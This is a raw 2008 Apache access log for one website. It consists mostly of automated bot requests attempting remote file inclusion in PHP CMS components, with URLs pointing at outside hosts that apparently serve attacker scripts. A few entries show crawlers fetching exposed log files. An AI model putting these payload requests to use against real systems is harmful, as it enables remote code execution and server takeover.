213.20.229.11 - - [18/Aug/2008:09:35:26 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bk-muenchen.de/cms/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.172.182.209 - - [18/Aug/2008:09:35:28 -0700] "GET /logs/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [18/Aug/2008:09:35:28 -0700] "GET /!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.20.229.11 - - [18/Aug/2008:09:35:28 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bk-muenchen.de/cms/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [18/Aug/2008:09:35:34 -0700] "GET /logs/access_080708.log/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [18/Aug/2008:09:35:35 -0700] "GET /logs/access_080605.log/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:35:47 -0700] "GET /logs/access_080626.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:35:48 -0700] "GET /logs/access_080626.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:09:37:32 -0700] "GET /logs/access_080315.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:09:37:32 -0700] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:09:37:32 -0700] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:37:42 -0700] "GET /logs/access_080724.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:37:45 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:37:46 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:37:47 -0700] "GET /logs/access_080626.log/phphtml.php?htmlclass_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:37:47 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:38:14 -0700] "GET /logs/access_080720.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:38:39 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:38:40 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:38:41 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.236.10.71 - - [18/Aug/2008:09:38:42 -0700] "GET /logs/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.236.10.71 - - [18/Aug/2008:09:38:42 -0700] "GET /!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:39:16 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:39:17 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:39:18 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:39:41 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:39:42 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:40:18 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.182.209 - - [18/Aug/2008:09:40:26 -0700] "GET /logs/access_080621.log/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:09:40:55 -0700] "GET /logs/access_080606.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:41:47 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:41:58 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albforum.freehostia.com/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:41:59 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albforum.freehostia.com/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.172.182.209 - - [18/Aug/2008:09:43:03 -0700] "GET /logs/access_080708.log/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.20.229.11 - - [18/Aug/2008:09:43:04 -0700] "GET /logs/access_080110.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bk-muenchen.de/cms/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.172.182.209 - - [18/Aug/2008:09:43:09 -0700] "GET /logs/access_080605.log/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.222.144 - - [18/Aug/2008:09:43:40 -0700] "GET //cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [18/Aug/2008:09:43:51 -0700] "GET /logs/?sourcedir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 200 61141 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [18/Aug/2008:09:43:54 -0700] "GET /?sourcedir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 200 10961 "-" "libwww-perl/5.79" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:09:44:31 -0700] "GET /logs/access_080110.log//claroline/phpbb/page_tail.php?includePath=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:45:49 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:45:49 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:46:00 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.13.208.102 - - [18/Aug/2008:09:46:15 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/-ZeR0-/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.13.208.102 - - [18/Aug/2008:09:46:15 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/-ZeR0-/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.110.190.171 - - [18/Aug/2008:09:46:40 -0700] "GET /logs//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.110.190.171 - - [18/Aug/2008:09:46:40 -0700] "GET //cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.223.25 - - [18/Aug/2008:09:46:50 -0700] "GET /logs/access_080808.log//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [18/Aug/2008:09:46:51 -0700] "GET //modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [18/Aug/2008:09:46:51 -0700] "GET /logs//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:09:47:11 -0700] "GET /logs/?sourcedir=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 200 61141 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:09:47:12 -0700] "GET /?sourcedir=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 200 10977 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.223.25 - - [18/Aug/2008:09:47:25 -0700] "GET /logs/access_080809.log//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:09:47:30 -0700] "GET /logs/access_080213.log/?sourcedir=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:09:47:30 -0700] "GET /logs/?sourcedir=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 200 61141 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:09:47:30 -0700] "GET /logs/access_080209.log/?sourcedir=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:09:47:31 -0700] "GET /?sourcedir=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 200 10977 "-" "libwww-perl/5.805" "www.dmulk.com"
216.110.190.171 - - [18/Aug/2008:09:47:48 -0700] "GET /logs//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.110.190.171 - - [18/Aug/2008:09:47:49 -0700] "GET //cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.67.201 - - [18/Aug/2008:09:48:01 -0700] "GET /blog/?nggpage=3&pageid=169&show=gallery HTTP/1.1" 200 9745 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
65.55.213.30 - - [18/Aug/2008:09:48:04 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.213.30 - - [18/Aug/2008:09:48:06 -0700] "GET /logs/access_080227.log HTTP/1.0" 200 1421805 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
62.129.240.226 - - [18/Aug/2008:09:48:15 -0700] "GET /logs/access_080809.log//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.129.240.226 - - [18/Aug/2008:09:48:15 -0700] "GET //modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:09:48:15 -0700] "GET /logs/?sourcedir=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 200 61141 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:09:48:16 -0700] "GET /?sourcedir=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 200 10977 "-" "libwww-perl/5.79" "www.dmulk.com"
62.129.240.226 - - [18/Aug/2008:09:48:16 -0700] "GET /logs//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.115.34.17 - - [18/Aug/2008:09:48:49 -0700] "GET /errors.php?error=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
86.109.96.134 - - [18/Aug/2008:09:49:02 -0700] "GET /logs/access_080207.log//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.96.134 - - [18/Aug/2008:09:49:03 -0700] "GET //modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.96.134 - - [18/Aug/2008:09:49:03 -0700] "GET /logs//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:09:49:27 -0700] "GET /logs/access_080227.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:09:49:28 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:09:49:28 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.222.144 - - [18/Aug/2008:09:49:34 -0700] "GET /logs/access_080808.log//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.222.144 - - [18/Aug/2008:09:49:34 -0700] "GET //cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.222.144 - - [18/Aug/2008:09:49:35 -0700] "GET /logs//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.110.190.171 - - [18/Aug/2008:09:49:35 -0700] "GET /logs/access_080708.log//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.110.190.171 - - [18/Aug/2008:09:49:35 -0700] "GET //cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.110.190.171 - - [18/Aug/2008:09:49:35 -0700] "GET /logs//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:09:50:04 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:09:50:05 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:09:50:05 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.56.77.155 - - [18/Aug/2008:09:50:05 -0700] "GET /logs/access_080708.log//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.77.155 - - [18/Aug/2008:09:50:06 -0700] "GET //cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.77.155 - - [18/Aug/2008:09:50:06 -0700] "GET /logs//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:09:50:14 -0700] "GET /logs/access_080209.log/?sourcedir=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:09:50:14 -0700] "GET /logs/access_080215.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.129.240.226 - - [18/Aug/2008:09:50:27 -0700] "GET /logs/access_080207.log//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.129.240.226 - - [18/Aug/2008:09:50:27 -0700] "GET //modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.129.240.226 - - [18/Aug/2008:09:50:27 -0700] "GET /logs//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.222.144 - - [18/Aug/2008:09:50:33 -0700] "GET /logs/access_080725.log//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.129.240.226 - - [18/Aug/2008:09:50:33 -0700] "GET /logs/access_080809.log//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:50:35 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:50:35 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:09:50:44 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://sibtorg.com/shop/usr/extensions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:09:50:45 -0700] "GET //include/write.php?dir=http://sibtorg.com/shop/usr/extensions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:09:50:46 -0700] "GET /logs/access_080209.log/?sourcedir=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:09:50:46 -0700] "GET /logs//include/write.php?dir=http://sibtorg.com/shop/usr/extensions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:09:50:51 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://sibtorg.com/shop/usr/extensions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:09:50:51 -0700] "GET //include/write.php?dir=http://sibtorg.com/shop/usr/extensions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:09:50:52 -0700] "GET /logs//include/write.php?dir=http://sibtorg.com/shop/usr/extensions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.149.226.176 - - [18/Aug/2008:09:50:56 -0700] "GET /logs/access_080809.log//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [18/Aug/2008:09:50:57 -0700] "GET //cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [18/Aug/2008:09:50:57 -0700] "GET /logs//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.22.125 - - [18/Aug/2008:09:51:00 -0700] "GET /logs/access_080125.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.75.155.204 - - [18/Aug/2008:09:51:03 -0700] "GET /logs/access_080724.log//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.155.204 - - [18/Aug/2008:09:51:03 -0700] "GET //cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.155.204 - - [18/Aug/2008:09:51:04 -0700] "GET /logs//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.149.226.176 - - [18/Aug/2008:09:51:13 -0700] "GET /logs/access_080725.log//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:09:51:14 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.115.241.201 - - [18/Aug/2008:09:51:43 -0700] "GET /logs/access_070821.log HTTP/1.0" 200 64221 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.dmulk.com"
200.115.241.201 - - [18/Aug/2008:09:51:43 -0700] "GET /logs/access_070910.log HTTP/1.0" 200 50863 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.dmulk.com"
200.115.241.201 - - [18/Aug/2008:09:51:43 -0700] "GET /logs/access_070909.log HTTP/1.0" 200 75478 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.dmulk.com"
89.149.226.176 - - [18/Aug/2008:09:51:58 -0700] "GET /logs//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [18/Aug/2008:09:51:59 -0700] "GET //cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.94.70.15 - - [18/Aug/2008:09:52:32 -0700] "GET /logs/access_080621.log//modules/vwar/admin/admin.php?vwar_root=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:09:52:52 -0700] "GET /logs/access_080313.log%20/?sourcedir=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.77.155 - - [18/Aug/2008:09:53:11 -0700] "GET /logs//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.77.155 - - [18/Aug/2008:09:53:11 -0700] "GET //cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
